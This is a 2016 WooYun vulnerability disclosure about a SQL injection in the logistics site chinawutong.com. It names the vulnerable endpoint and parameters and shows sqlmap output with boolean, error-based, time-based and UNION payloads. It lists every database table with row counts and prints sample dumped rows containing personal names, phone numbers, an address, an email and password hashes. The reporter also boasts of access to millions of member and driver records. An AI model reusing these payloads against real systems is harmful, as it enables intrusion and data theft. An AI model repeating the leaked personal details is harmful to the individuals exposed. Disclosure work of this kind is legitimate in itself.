乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-09: 细节已通知厂商并且等待厂商处理中 2016-05-10: 厂商已经确认,细节仅向厂商公开 2016-05-20: 细节向核心白帽子及相关领域专家公开 2016-05-30: 细节向普通白帽子公开 2016-06-09: 细节向实习白帽子公开 2016-06-24: 细节向公众公开
主站
注入点
http://www.chinawutong.com/ashx/infomationAppraise.ashx
POST:
cust_id=1&labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis
放sqlmap跑
sqlmap resumed the following injection point(s) from stored session:---Parameter: cust_id (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: cust_id=-4198 OR 6688=6688&labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: cust_id=1 AND 7375=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7375=7375) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)))&labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: cust_id=(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3826=3826) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113))&labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: cust_id=1 AND 7828=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: cust_id=1 UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(106)+CHAR(113)+CHAR(105)+CHAR(80)+CHAR(106)+CHAR(85)+CHAR(75)+CHAR(99)+CHAR(86)+CHAR(69)+CHAR(68)+CHAR(87)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113),NULL-- &labletype=1&msgid=2839277&random=0.7775147766806185&type=ResLableDis---[21:04:18] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[21:04:18] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
关于几个表拖取两条信息得出1000W+物流单子电话。166W会员电话,邮箱,登录密码,740W+车主信息
Database: WutongTable: SendEmailRecord[2 entries]+--------+---------+-------+-----------+-------------------+----------------------------+------------------+-----------+| id | cust_id | state | postion | toemail | sendtime | cust_name | cust_kind |+--------+---------+-------+-----------+-------------------+----------------------------+------------------+-----------+| 110135 | 1000017 | 1 | NotLogin7 | [email protected] | 08 15 2013 \\?a0\\?32:08AM | liwei13316698293 | 车主 || 110135 | 1000017 | 1 | NotLogin7 | [email protected] | 08 15 2013 \\?a0\\?32:08AM | liwei13316698293 | 车主 |+--------+---------+-------+-----------+-------------------+----------------------------+------------------+-----------+
Database: Wutong +--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| dbo.huoOld | 11178014 || dbo.GpsInfo | 8886089 || dbo.syncobj_0x3941454338303739 | 7916549 || dbo.SendEmailRecord | 7495822 || dbo.VI_SpecialLinePH | 4312516 || dbo.VI_SpecialLinePH | 4312516 || dbo.wshiMainline_Price | 2469687 || dbo.wshiMainline_Price | 2469687 || dbo.WebLog | 2074706 || dbo.syncobj_0x3432413846314237 | 2004410 || dbo.Url_Query | 2004408 || dbo.ClickLog | 1879819 || dbo.huiyuan | 1610115 || dbo.syncobj_0x3941433934453033 | 1610115 || dbo.Vi_Company | 1579482 || dbo.syncobj_0x4337414434364446 | 1454573 || dbo.cheLine | 1454559 || dbo.VI_CarLine | 1452766 || dbo.LoginRecord | 1438074 || dbo.push_Themes | 1386188 || dbo.syncobj_0x3431413941393845 | 1355991 || dbo.qiyepic | 1104359 || dbo.qiyepic | 1104359 || dbo.push_CustomerTempThemes | 1054416 || dbo.WapLog | 984815 || dbo.syncobj_0x4339373236303533 | 880646 || dbo.qiyeView | 880636 || dbo.com | 699016 || dbo.syncobj_0x4244313642423031 | 699016 || dbo.caiwu | 614789 || dbo.tb_SupplyInfor | 545626 || dbo.CarLineUrl | 443147 || dbo.TuiSong | 410486 || dbo.message | 301397 || dbo.syncobj_0x4437323042423046 | 301397 || dbo.InterLine | 291530 || dbo.chezhu | 225582 || dbo.syncobj_0x3341323332334235 | 225582 || dbo.wsheng | 165264 || dbo.UserGPS | 132919 || dbo.push_autoPublish | 109767 || dbo.huo_order | 109032 || dbo.huo_order | 109032 || dbo.zhaoshang | 85792 || dbo.Picture_Licence | 83630 || dbo.syncobj_0x3945303641323639 | 83630 || dbo.HRJobs | 72501 || dbo.HRJobCityPK | 72181 || dbo.android_Recommend | 66559 || dbo.syncobj_0x4633343746373234 | 62929 || dbo.jianli | 60508 || dbo.ServiceRecord | 59927 || dbo.VI_Wshi | 59278 || dbo.ygrizhi | 57785 || dbo.kshi | 46304 || dbo.push_CustomerTopic | 37588 || dbo.HotmainLine | 34560 || dbo.bshi | 30831 || dbo.daili | 29226 || dbo.InterAir | 27658 || dbo.bx_xyzBackContent | 27570 || dbo.PayLog | 24963 || dbo.IMEI | 24345 || dbo.syncobj_0x3842333734433030 | 24345 || dbo.TopContacts | 20212 || dbo.GoodsDetail | 16736 || dbo.push_roborder | 16353 || dbo.banjia | 14887 || dbo.CoPicture | 13684 || dbo.TopGoods | 13583 || dbo.ksheng | 13025 || dbo.SourceRecord | 12167 || dbo.kuaijian | 11880 || dbo.InterShipping | 11808 || dbo.Gonggao | 10621 || dbo.Product | 9449 || dbo.ChengYunOrder | 7165 || dbo.DiaoCha | 6775 || dbo.GjHuo | 6755 || dbo.wxt_dd | 5808 || dbo.Appraise | 5412 || dbo.CustLocation | 5354 || dbo.ReturnPwd | 5145 || dbo.AIRPORT | 4915 || dbo.wshiLinShi | 4596 || dbo.wshiLinShi | 4596 || dbo.jiameng_order | 4240 || dbo.infomationAppraise | 4169 || dbo.WliuZbiao | 4050 || dbo.ImgLocation | 3807 || dbo.InterShippingReq | 3254 || dbo.LISTAreas | 3220 || dbo.HRPostSeekerPK | 3089 || dbo.adminrizhi | 3003 || dbo.renzheng_geren | 2734 || dbo.InterAirReq | 2428 || dbo.CustLink | 2353 || dbo.EmailTriggerRecord | 2305 || dbo.renzheng_qiye | 2289 || dbo.tb_BuyInfor | 2124 || dbo.link | 1984 || dbo.tem_userset | 1933 || dbo.Url_Gj | 1797 || dbo.VoicWshi | 1791 || dbo.Temp | 1654 || dbo.bx_CusInsureInfo | 1629 || dbo.RankTwo | 1486 || dbo.Cert_Car | 1392 || dbo.Refuse_Collect | 1253 || dbo.SEAPORT | 1233 || dbo.wshiOrder | 1212 || dbo.bx_points | 1181 || dbo.bx_categories | 1091 || dbo.syssubscriptions | 1020 || dbo.IDcardCheck | 953 || dbo.ModelKey | 883 || dbo.TenderDocument | 836 || dbo.OwnerContract | 800 || dbo.NewsData | 753 || dbo.CW_Device | 730 || dbo.HRExperience | 606 || dbo.HREducation | 580 || dbo.OwnersInsurance | 542 || dbo.syncobj_0x3532453846423539 | 542 || dbo.view_Prize | 537 || dbo.sysarticlecolumns | 459 || dbo.bx_ParamsInsureInfo | 451 || dbo.BlackList | 449 || dbo.HighlyRecommend | 417 || dbo.LP_Merchants | 403 || dbo.Coupons | 380 || dbo.DomainList | 322 || dbo.Collect_Car | 296 || dbo.Collect_Car | 296 || dbo.Emails | 296 || dbo.LongSourceHY | 244 || dbo.LongSourceHY | 244 || dbo.LP_WearHouse | 234 || dbo.Nations | 224 || dbo.HRSeekerCompayPK | 222 || dbo.HRSeekerCompayPK | 222 || dbo.Vi_HRApplySeeker | 222 || dbo.sysextendedarticlesview | 204 || dbo.LP_CarPark | 198 || dbo.sysschemaarticles | 191 || dbo.tb_TwoLeve | 178 || dbo.SMT_ypxxtwo | 175 || dbo.china_ad | 164 || dbo.CARRIER | 137 || dbo.HRAbility | 128 || dbo.bx_packages | 121 || dbo.GpsAuthorization | 115 || dbo.huo_print | 112 || dbo.goq_Company | 96 || dbo.LP_HouseRent | 90 || dbo.HRFavJob | 77 || dbo.HRFavSeeker | 75 || dbo.LP_LogisticsCom | 67 || dbo.gpsUserInfo | 66 || dbo.GY_contribute | 58 || dbo.GY_EmergencyGoods | 54 || dbo.GY_searchPerson | 54 || dbo.yuangong | 48 || dbo.NewsCata | 38 || dbo.NewsCata | 38 || dbo.GY_CharityCom | 37 || dbo.bx_conveyances | 36 || dbo.RankOne | 36 || dbo.LP_Catering | 31 || dbo.jop | 29 || dbo.LP_AutoRepair | 24 || dbo.LP_Hotel | 24 || dbo.android_Products | 23 || dbo.androidImg | 23 || dbo.HRCoverLetter | 23 || dbo.GY_safety | 21 || dbo.GY_help | 20 || dbo.SMT_ypxxone | 20 || dbo.tb_OneLeve | 20 || dbo.HRTrain | 19 || dbo.MailTemp | 15 || dbo.sysarticles | 13 || dbo.CheckInfo | 11 || dbo.zhengshu | 11 || dbo.huodong_order | 10 || dbo.config | 8 || dbo.VI_RandomLinks | 8 || dbo.pay_information | 7 || dbo.tc_car | 7 || dbo.NewsClass | 6 || dbo.bumen | 5 || dbo.keshi | 5 || dbo.WebBlackUser | 5 || dbo.Admin | 4 || dbo.android_Activities | 4 || dbo.powerUnit | 4 || dbo.userPower | 4 || dbo.WebLink | 4 || dbo.yanzheng_jiashi | 4 || dbo.bx_plan | 3 || dbo.rolePower | 3 || dbo.LP_Show | 2 || dbo.TextLocation | 2 || dbo.wshiMainlineLinShi | 2 || dbo.yanzheng_xingshi | 2 || dbo.LP_Culture | 1 || dbo.PageNum | 1 || dbo.syspublications | 1 || dbo.sysreplservers | 1 |+--------------------------------+---------+
Database: WutongTable: huiyuan[2 entries]+---------+---------+------------------+------------------------------------+-------------------+---------+---------+---------+---------+---------+---------+---------+---------+---------+---------+---------+-------------+--------------------+--------+---------+------------------------------------+------------------+----------+----------+--------------------+----------+----------+-----------+-----------+-----------+-----------+-----------+--------------------+-----------+-----------+-----------+-----------+------------------+------------+----------------------------+-------------+----------------------------+-------------+--------------+---------------+-----------------+| id | vipmid | OpenID | OpenVipmidTime | CloseVipmidTime | co | num | url | vnum | time | vyear | email | price | vtype | cishu | domain | Verify | WapNum | VLevel | zcrtel | SoftNum | Issample | beiannum | truename | WebSite1 | yuangong | zhuceren | cust_pass | pass_note | stylename | logintime | scoreGive | WXTNumber | cust_name | cust_kind | ipviptime | zhuangtai | Ispromoter | wanshanRen | Recommend1 | pass_answer | OpenVipTime | GpsLoginNum | CloseVipTime | ChengxinState | CurrentPosition |+---------+---------+------------------+------------------------------------+-------------------+---------+---------+---------+---------+---------+---------+---------+---------+---------+---------+---------+-------------+--------------------+--------+---------+------------------------------------+------------------+----------+----------+--------------------+----------+----------+-----------+-----------+-----------+-----------+-----------+--------------------+-----------+-----------+-----------+-----------+------------------+------------+----------------------------+-------------+----------------------------+-------------+--------------+---------------+-----------------+| <blank> | <blank> | 554503 | 05 \\?a0\\?33 2011 \\?a0\\?33:43PM | 35 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 15954123715 | 05 3 2011 3:43PM | 37 | <blank> | 05 \\?a0\\?33 2011 \\?a0\\?33:19PM | [email protected] | <blank> | <blank> | 05 3 2011 3:19PM | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 01 1 1900 12:00AM | <blank> | <blank> | <blank> | <blank> | 49ba59abbe56e057 | <blank> | 2 | <blank> | 01 \\?a0\\?31 1900 12:00AM | wanghongxi | 0 | 王洪喜 | chezhu_01 || <blank> | <blank> | 66751838c7330d1c | 01 \\?a0\\?31 1900 12:00AM | 江西省抚州市金溪县秀谷中大道95号 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | android- | 11 30 2015 9:30AM | 320 | <blank> | 1 | 15397943253 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 01 1 1900 12:00AM | <blank> | <blank> | <blank> | <blank> | chezhu_01 | <blank> | 11 30 2015 \\?a0\\?39:30AM | <blank> | 1666090 | 13 | 韩军城 | 0 | 2 |
Database: WutongTable: huoOld[1 entry]+---------+---------+---------+---------+---------+---------------+---------+---------+-------+---------+---------+---------+--------+--------------------+---------+---------+---------+---------+------------------------------------+---------+---------+--------------------+----------+----------+----------+----------+----------+----------+----------+----------+----------+-------------+-----------+---------------------------+| id | cust_id | px | tel | tiji | cell | time | state | Prize | daoqi | topro | tocity | beizhu | huolei | huoshu | huozhu | hyming | changqi | huokind | frompro | leixing | contact | tocounty | itslong4 | fromcity | itslong2 | itslong1 | zaizhong | itslong3 | shuoming | shuliang | huodanwei | hyleixing | fromcounty |+---------+---------+---------+---------+---------+---------------+---------+---------+-------+---------+---------+---------+--------+--------------------+---------+---------+---------+---------+------------------------------------+---------+---------+--------------------+----------+----------+----------+----------+----------+----------+----------+----------+----------+-------------+-----------+---------------------------+| <blank> | 23 | <blank> | <blank> | <blank> | 027-88107380 | <blank> | <blank> | 0 | 3575424 | <blank> | <blank> | NULL | 01 4 2013 2:53PM | <blank> | <blank> | <blank> | 706109 | 01 \\?a0\\?34 2013 \\?a0\\?32:53PM | 1 | <blank> | 01 14 2013 12:00AM | <blank> | <blank> | n | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 13476240908 | <blank> | 长沙有化工产品23吨,求8-9.6米的车,明天装车 |
1000W+物流单子电话。166W会员电话,邮箱,登录密码,740W+车主信息
你们懂。。。
危害等级:高
漏洞Rank:18
确认时间:2016-05-10 12:06
感谢反馈,已安排人进行修复
暂无